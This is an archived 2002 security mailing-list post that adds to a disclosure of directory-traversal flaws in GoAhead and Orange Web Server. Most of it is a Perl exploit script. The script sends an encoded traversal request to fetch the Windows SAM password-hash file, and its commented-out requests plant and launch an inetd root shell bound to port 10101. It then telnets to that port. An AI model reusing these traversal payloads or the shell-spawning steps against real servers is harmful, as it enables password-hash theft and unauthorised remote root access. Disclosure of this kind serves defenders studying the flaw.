OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
xile_at_hushmail.com
Date: Wed Jul 17 2002 - 10:17:22 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Have been aware for some time and I Just wanted to add a little to

    Mr. Moore's observations ;

    Title: GoAhead Web Server Directory Traversal + Cross Site Scripting

    >Also Effected: Orange Web Server -all versions

    Risk Rating: Medium

    >escalated to risk: high - password hash pilfer via 300 year old

    >traversal technique

    Software: GoAhead Web Server v2.1
    <added Orange Web Server - All
    <Orange Web Server uses GoAhead WebServer 2.1 technology so it is

    <powerful and stable. - nuff said

    Platforms: Windows NT/98/95/CE
                Embedded Linux
                Linux
                QNX
                Novell Netware + others

    <ADDED: Hard Hat Linux - started
    <bundling GoAhead with thier distros, so there should be palm

    <pilots, cellphones and all kinds of nifty prototype devices

    <running this sad-ware

    #!/usr/bin/perl
    # spawns a shell on port 10101
    use IO::Socket;
    if (ARGV < 1) { print "usage: perl go-orange.pl [host]\n"; exit; }
    $host = $ARGV[0];

    $shell = IO::Socket::INET->new( PeerAddr=>"$host",
     PeerPort=>"80",
     Proto=>"tcp") || die "Connection failed.\n";

    #dump sam is success on Orange and GoAhead!- was able to jump around

    #and do interesting things with encoding 0-day
    #%77innt/s%79s%74em%332/%63%6D%64.%65x%65?/c%25%32%30ech%6F%%320W%65

    print $shell "GET /..%5C..%5C..%5C..%5C..%5C..%5C/winnt/repair/sam

    ##################################################################
    #commented out hypothetical embedded webserver in transmeta-maytag

    #stove scenario. Will leave hand held device ( game boy) format vuln

    #testing to experts at Non-profit .org's
    # Only testbeds I saw were win32 ( I only looked for 10 #minutes)

    #print $shell "GET
    #/..%5C..%5C..%5C..%5C..%5C..%5C/bin/echo%20\"10101%20stream%20tcp%2

    #0nowait%20root%20/bin/sh%20-i\"%20>>%20/tmp/inet|
    #HTTP/1.0\n\n";

    # we get signal again
    #$shell = IO::Socket::INET->new( PeerAddr=>"$host",
    #PeerPort=>"80",
    #Proto=>"tcp") || die "fuq, we no get signal.\n";

    #print $shell "GET

    #/..%5C..%5C..%5C..%5C..%5C..%5C/usr/sbin/inetd%20/tmp/inet|

    #HTTP/1.0\n\n";

    sleep 1;

    print "handheld haqrz connect to $host on port 10101...";
    system("telnet $host 10101");

    - - xile
    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.1
    Note: This signature can be verified at https://www.hushtools.com

    wlkEARECABkFAj01ioASHHhpbGVAaHVzaG1haWwuY29tAAoJEBnsRZrmhGsJapUAnRCE
    Mg4OfVISUBrPgWxFcbW2mK6XAJ4/xxmJInaJRv/YqC45ki6wYPOPbA==
    =IKhW
    -----END PGP SIGNATURE-----

    Communicate in total privacy.
    Get your free encrypted email at https://www.hushmail.com/?l=2

    Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople